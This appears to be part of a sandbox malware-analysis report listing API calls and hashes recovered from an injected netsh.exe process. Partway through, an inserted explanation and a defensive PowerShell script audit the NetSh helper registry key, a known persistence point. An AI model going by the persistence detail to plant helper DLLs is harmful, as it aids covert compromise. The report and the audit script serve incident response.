              • Opcode ID: 54c400d8bae666632fc7c93a86ea0c124001db5e90a782b3ccbba0f5a256fe82
              • Instruction ID: 007129a65710c891387262502b9f3428484d7ff68e018e02b83a46dba655390c
              • Opcode Fuzzy Hash: 54c400d8bae666632fc7c93a86ea0c124001db5e90a782b3ccbba0f5a256fe82
              • Instruction Fuzzy Hash: 0A513432620207AFDB21AF7CDC8996EBBADFB452A4F044629E9019B150E7708C54DBD0
              APIs
              • _wcsicmp.MSVCRT ref: 01563A59
              • _wcsicmp.MSVCRT ref: 01563A6F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563A95
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563A9C
              • memcpy.MSVCRT ref: 01563ABB
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563AD6
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563ADD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 01563B07
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B0E
              • _wcsupr.MSVCRT ref: 01563B31
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B46
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B4D
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$_wcsicmp$Free_wcsuprmemcpy
              • String ID: ipxmontr.dll$ipxpromn.dll
              • API String ID: 1906506965-3013806906
              • Opcode ID: cf4bf378662fae3802108ff10add92b43d2d339df01b0845f4c81e9891e98836
              • Instruction ID: 190e8c0a1f38bdb29c150933723976601d391340bb91a9d98ddc684c113f700a
              • Opcode Fuzzy Hash: cf4bf378662fae3802108ff10add92b43d2d339df01b0845f4c81e9891e98836
              • Instruction Fuzzy Hash: 01412E71A002029BDB259F7CF84E9AABBBCFB44325711042EE95ADF145DB30E509DBA0
              APIs
              • wcspbrk.MSVCRT ref: 01567481
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?), ref: 01567634
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156763B
              • PrintMessageFromModule.NETSH(00003AA0,?), ref: 01567650
              • PrintMessageFromModule.NETSH(00000068), ref: 01567673
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromHeapMessageModulePrint$FreeProcesswcspbrk
              • String ID:
              • API String ID: 3977950575-0
              • Opcode ID: f7bbba05a0e575d12d984709499f479bec565f199042cc7563c388fd1a5ce501
              • Instruction ID: 710f7836898c036eda4ed7fdda15d55a0cf4c277f3c1f4ea018eea7c79057ba6
              • Opcode Fuzzy Hash: f7bbba05a0e575d12d984709499f479bec565f199042cc7563c388fd1a5ce501
              • Instruction Fuzzy Hash: 5F71B271D00216DFDF21CFA8D8899AEBBB9FB48328F054565E826AB251D7349D44CFD0
              APIs
                • Part of subcall function 01569CA9: __iob_func.MSVCRT ref: 01569CAE
              • fflush.MSVCRT ref: 015677ED
              • fgets.MSVCRT ref: 01567800
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,000000FF,00000000,00000000,00000000,?,?,?,?,?), ref: 01567820
              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,?,?), ref: 01567827
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000002,?,00000000,?,?,?,?,?), ref: 0156786B
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?), ref: 0156787B
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?), ref: 01567887
              • PrintError.NETSH(00000000,00000000,?,?,?,?,?), ref: 0156788F
                • Part of subcall function 01567BC0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
                • Part of subcall function 01567BC0: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
                • Part of subcall function 01567BC0: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567BC0: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000002,?,00000000,?,?,?,?,?), ref: 015678AD
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?), ref: 015678BD
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?), ref: 015678C9
              • PrintError.NETSH(00000000,00000000,?,?,?,?,?), ref: 015678D1
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?), ref: 015678DD
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?), ref: 015678E4
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00002000,00000000,00000000,?,?,?,?,?), ref: 01567900
              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,?,?), ref: 01567907
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Error$Handle$ByteCharCloseConsoleFileHeapLastMultiOutputPrintWideWrite$AllocFormatFreeLoadLocalMessageProcessString__iob_funcfflushfgets
              • String ID:
              • API String ID: 3788396652-0
              • Opcode ID: f1246c9645d48bfcacaf5b1e95f22b0603fe1a5b820bde0b220cb040fa6f0022
              • Instruction ID: 58c090884c6ade678e6fd445c8ec81ea5e088511d33b599ea7b06bcf3ea189a9
              • Opcode Fuzzy Hash: f1246c9645d48bfcacaf5b1e95f22b0603fe1a5b820bde0b220cb040fa6f0022
              • Instruction Fuzzy Hash: 31319175610205AFE7319B65FC8DEAA7BBCFB88725F010059FA15CB145EA308908EBB1
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A4C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A53
                • Part of subcall function 015653D8: _wcslwr.MSVCRT ref: 015653EE
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A85
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A8C
              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 01566AFE
              • PrintMessageFromModule.NETSH(000000B4,?,?,00000000,?), ref: 01566B14
              • PrintError.NETSH(00000000,00000000,?,00000000,?), ref: 01566B20
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000208,?,?,00000000,?), ref: 01566B9C
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566BA3
              • PrintMessageFromModule.NETSH(00000000,0000000E,?,?,00000000,?), ref: 01566BB5
                • Part of subcall function 01568D48: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006,?,?,?), ref: 01568D7D
                • Part of subcall function 01568D48: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(01561C9C,00000000,00000001,01561CAC,?), ref: 01568DAA
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568DED
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568E37
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568E4B
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(00000000), ref: 01568E54
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(00000000), ref: 01568E92
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(00000000), ref: 01568E99
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(?), ref: 01568EA3
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: String$AllocHeap$Free$PrintProcess$FromMessageModule$ComputerCreateErrorInitializeInstanceName_wcslwr
              • String ID: \\%s\ipc$$netsh
              • API String ID: 876722747-2229480662
              • Opcode ID: d644b8c402a2a3bc8c805b379b41338f44700d001e8fa02404ef923f5fca221f
              • Instruction ID: 4ac08240784d6190651d67d402aee2b7ad109c219c8e68d75cdea9fd339ed224
              • Opcode Fuzzy Hash: d644b8c402a2a3bc8c805b379b41338f44700d001e8fa02404ef923f5fca221f
              • Instruction Fuzzy Hash: 8F51BDB1614312ABD725EF29E88596FB7ECFB84724F00891EB955CF240EB70D9448BE1
              APIs
              • _wcsicmp.MSVCRT ref: 01563BA6
              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,STRING,00000000,000F003F,00000000,?,00000000), ref: 01563BE3
              • _wcsdup.MSVCRT ref: 01563BF4
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C07
              • wcsrchr.MSVCRT ref: 01563C1A
              • wcsrchr.MSVCRT ref: 01563C29
              • wcsrchr.MSVCRT ref: 01563C50
              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,00000000,00000001,00000000,00000000), ref: 01563C90
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C9E
              • free.MSVCRT(00000000), ref: 01563CA5
              • PrintMessageFromModule.NETSH(000003E8), ref: 01563CD4
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcsrchr$Close$CreateFromMessageModulePrintValue_wcsdup_wcsicmpfree
              • String ID: SOFTWARE\Microsoft\NetSh$STRING
              • API String ID: 3059030296-2051982046
              • Opcode ID: ff5bbc6fe9c3b25f4dab57dd985e848a7af2aacef83dd31f0c27e6e7897184c7
              • Instruction ID: b6f72ac2eda50c44902269d0949c0a21c0d4bcace193391ee9b1fc7b5ee5f0b3
              • Opcode Fuzzy Hash: ff5bbc6fe9c3b25f4dab57dd985e848a7af2aacef83dd31f0c27e6e7897184c7
              • Instruction Fuzzy Hash: 7E41E436600215AFEB255B29FC4AAAE776DFF85225F11006DF50A9F184EE709D08DBA0
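              The three records above that touch HKLM\SOFTWARE\Microsoft\NetSh (RegCreateKeyExW/RegSetValueExW at 01563BE3/01563C90, RegDeleteValueW at 01563DA2, RegEnumValueW at 01563FBA) are netsh's own helper add/delete/show routines, recovered from the memory of the process the sample injected into; the report does not show the sample invoking them. A DLL registered under that key is loaded by every subsequent netsh.exe start, so a responder triaging this host will want to audit it. The following PowerShell is an added example, not part of the Joe Sandbox report or of netsh; its heuristics (stock helpers are bare file names under System32 with a valid Microsoft signature) are assumptions of this example, and the -KeyPath parameter is provided so the same check can be pointed at a loaded offline SOFTWARE hive.

```powershell
# Added example (not from the Joe Sandbox report): audit the netsh helper registry
# key that the dumped netsh add/delete/show helper functions read and write.
# Assumptions: run elevated on the triaged host; a loaded offline hive can be
# passed via -KeyPath (e.g. 'HKLM:\OfflineSoftware\Microsoft\NetSh').
param(
    [string]$KeyPath = 'HKLM:\SOFTWARE\Microsoft\NetSh'
)

# netsh stores one REG_SZ value per helper: value name = helper label,
# value data = DLL file name (bare name, resolved by the loader) or a path.
$props  = Get-ItemProperty -Path $KeyPath -ErrorAction Stop
$values = $props.PSObject.Properties |
    Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' }

$sys32  = Join-Path $env:SystemRoot 'System32'
$report = foreach ($v in $values) {
    $dll      = [string]$v.Value
    $rooted   = [IO.Path]::IsPathRooted($dll)
    # Bare names are what a stock install contains; resolve them against System32.
    $resolved = if ($rooted) { $dll } else { Join-Path $sys32 $dll }
    $exists   = Test-Path -LiteralPath $resolved
    $sig      = if ($exists) { Get-AuthenticodeSignature -FilePath $resolved } else { $null }

    $flags = @()
    if ($rooted)                                    { $flags += 'absolute-path' }     # heuristic: stock entries are bare names
    if (-not $exists)                               { $flags += 'missing-file' }
    if ($exists -and $sig.Status -ne 'Valid')       { $flags += "signature:$($sig.Status)" }
    if ($exists -and $resolved -notlike "$sys32\*") { $flags += 'outside-system32' }

    [pscustomobject]@{
        Name     = $v.Name
        Data     = $dll
        Resolved = $resolved
        Signer   = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        Flags    = ($flags -join ',')
    }
}

# Rows with a non-empty Flags column are the ones to inspect: a helper that is
# unsigned, missing, outside System32 or registered by absolute path is loaded
# into every netsh.exe on this host, including ones launched by an injected process.
$report | Sort-Object Flags -Descending | Format-Table -AutoSize
```

              Compare the Signer column against the Microsoft Windows publisher on a known-good host rather than trusting the Valid status alone; a self-signed or third-party certificate still yields Valid if its chain is trusted on the machine.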
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000010), ref: 01562141
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562148
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156215D
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562164
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562172
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562179
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01562185
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156218C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562199
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621A0
              • PrintMessageFromModule.NETSH(00000068), ref: 015621B5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015621D9
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621E0
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015621F2
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621F9
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$Free$FromMessageModulePrint
              • String ID:
              • API String ID: 794174124-0
              • Opcode ID: 3f230b178dfbc962b854d9b3a0241789467271882758cda383c38992b1dd685e
              • Instruction ID: dfc94f2a7b0c8ca8a3e81b854788e72a4cf261709ffb35bd34d4f5d0ec735afe
              • Opcode Fuzzy Hash: 3f230b178dfbc962b854d9b3a0241789467271882758cda383c38992b1dd685e
              • Instruction Fuzzy Hash: AF51F7B5A10212EBDB219F78E84986AB7FDFF44324B014819E95ADF244EB31D945CBA0
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcschr$FromMessageModulePrint$_wcsicmpmemcpy
              • String ID:
              • API String ID: 1297359847-0
              • Opcode ID: f24a7f3edc59bc96bf9b3cf954f61f7537c4c4faf9a274c90dfe00e06372fea5
              • Instruction ID: bc5d0294b37ffe89d7fe8d8661a1301a19f2f16dccee9c039ca3ed4823f68705
              • Opcode Fuzzy Hash: f24a7f3edc59bc96bf9b3cf954f61f7537c4c4faf9a274c90dfe00e06372fea5
              • Instruction Fuzzy Hash: 33810335A00202DFDF29DF68E8C1AAEBBB9FF44710B14406DD9119F684EB30A951CBD0
              APIs
                • Part of subcall function 0156401D: MatchToken.NETSH(?,?,00000000,00000000,?,?,?,0156566F,?,?,00000000,?), ref: 01564041
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,00000000,?), ref: 01565705
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156570C
              • GenericMonitor.NETSH(?,00000004,?,?,00000000,0156F3D8,?,?,?,00000000,?), ref: 01565741
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?), ref: 01565792
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01565799
              • memcpy.MSVCRT ref: 015657B3
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000004), ref: 015657C1
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015657C8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015612B0), ref: 01565808
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156580F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01565818
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156581F
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc$GenericMatchMonitorTokenmemcpy
              • String ID:
              • API String ID: 3287015945-0
              • Opcode ID: a00c3f8b6dffdde6d361609284f205994d73c9c6b805688acd6ac80e5ac1f840
              • Instruction ID: c803b7f3f3764fc7c42827308a639c9ab5a353a438b509e0b9d4f5995c24c43a
              • Opcode Fuzzy Hash: a00c3f8b6dffdde6d361609284f205994d73c9c6b805688acd6ac80e5ac1f840
              • Instruction Fuzzy Hash: A961C471664303ABD7219F68D849B6E77EDFB943A4F104828F9198F251EB30D848CBE1
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,?,?,?,?), ref: 015654B6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015654BD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?), ref: 01565547
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156554E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFree
              • String ID:
              • API String ID: 756756679-0
              • Opcode ID: 905f2939b3accd0e99323641275b6efce868b822783e5d62341340b3f5a9caa0
              • Instruction ID: 71591221ff06a256583bca63cc644c04dfecf0c2da9b1c5de76daa55f4e32f60
              • Opcode Fuzzy Hash: 905f2939b3accd0e99323641275b6efce868b822783e5d62341340b3f5a9caa0
              • Instruction Fuzzy Hash: 5751C5717A0302ABDB219F68EC49B6A7BADFB947A5F004425F959CF244E730C944CBE1
              APIs
              • PrintMessageFromModule.NETSH(00000087,00000000,?,?,?,01564CB5,?,00000002,?,?,?,?), ref: 0156850E
              • _wcsicmp.MSVCRT ref: 015685E2
              • PrintMessageFromModule.NETSH(?,00000070,?,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156881E
              • PrintMessageFromModule.NETSH(?,0000006F,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156882B
              • PrintMessageFromModule.NETSH(?,00000069,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156885D
              • PrintMessage.NETSH( %1!s!,?,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568888
              • PrintMessage.NETSH(01561320,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156889E
              • PrintMessageFromModule.NETSH(?,0000006B,015612B0,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015688B2
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015688C7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564CB5,?,00000002,?,?,?), ref: 015688CE
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$FromModule$Heap$FreeProcess_wcsicmp
              • String ID: %1!s!
              • API String ID: 1398923986-2251066777
              • Opcode ID: ae6699099e2a031a3b6a6a811dadf81f27d039fa255d897fb5552c3709050f62
              • Instruction ID: 02248122413525ead15503843cdbcc4d737e5046d58c880146f07ddf3e4810da
              • Opcode Fuzzy Hash: ae6699099e2a031a3b6a6a811dadf81f27d039fa255d897fb5552c3709050f62
              • Instruction Fuzzy Hash: 2AE19E70A003029FDB28CF68D881A6EB7BAFF98314B148568D9159F296DB71ED50CBD0
              APIs
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
              • PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567BC0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
                • Part of subcall function 01567BC0: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
                • Part of subcall function 01567BC0: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567BC0: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$ByteCharConsoleErrorFileFreeHandleMultiOutputProcessWideWrite$AllocCloseFormatLastLoadLocalMessagePrintString
              • String ID:
              • API String ID: 3846968651-0
              • Opcode ID: c8c48798eb728b5b6b474af3cfa30dced5fe7a6b1c56db2391dda443de8ad497
              • Instruction ID: 849094b999039d7ae4a64b0f51f13919f77c119c1bc7fcbb8326690e91122ce4
              • Opcode Fuzzy Hash: c8c48798eb728b5b6b474af3cfa30dced5fe7a6b1c56db2391dda443de8ad497
              • Instruction Fuzzy Hash: A21193B1511220BFDB316BB6FC4ED9B7F6CEB853797110118B626DA144EA309908EBB0
              APIs
              • qsort.MSVCRT ref: 01568336
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683A2
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683A9
              • PrintMessage.NETSH(%1!-14s! - ,01573FEC,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683BC
              • PrintMessage.NETSH(%1!-14s! - ,00000000,01573FEC,0156131C,?,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683F1
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,01573FEC,0156131C,?,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683FC
